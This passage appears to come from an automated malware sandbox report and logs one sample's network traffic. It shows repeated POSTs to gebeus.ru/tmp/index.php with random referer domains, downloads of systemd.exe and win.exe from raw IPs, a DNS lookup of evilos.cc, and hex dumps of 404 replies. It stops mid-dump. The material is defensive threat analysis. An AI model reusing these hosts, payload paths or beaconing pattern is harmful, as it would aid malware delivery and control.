    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wewwkflbpaqtq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tdqulnerhstaff.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 288Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ddcrjixvnjlweis.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gdughyktsbt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://psbkmfijtgxs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ycxtgfaggjcyqor.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ogexqdmlxvkrb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gfjdcfmhxmbvhdj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: gebeus.ru
    Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
    Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
    Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
    Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
    Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
    Source: global trafficHTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
    Source: global trafficHTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
    Source: global trafficDNS traffic detected: DNS query: evilos.cc
    Source: global trafficDNS traffic detected: DNS query: gebeus.ru
    Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 7591
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:43:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ea Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:43:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:43:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:43:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:43:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:43:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:43:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:43:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:43:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:44:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:44:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:44:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 19 Jul 2024 11:44:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 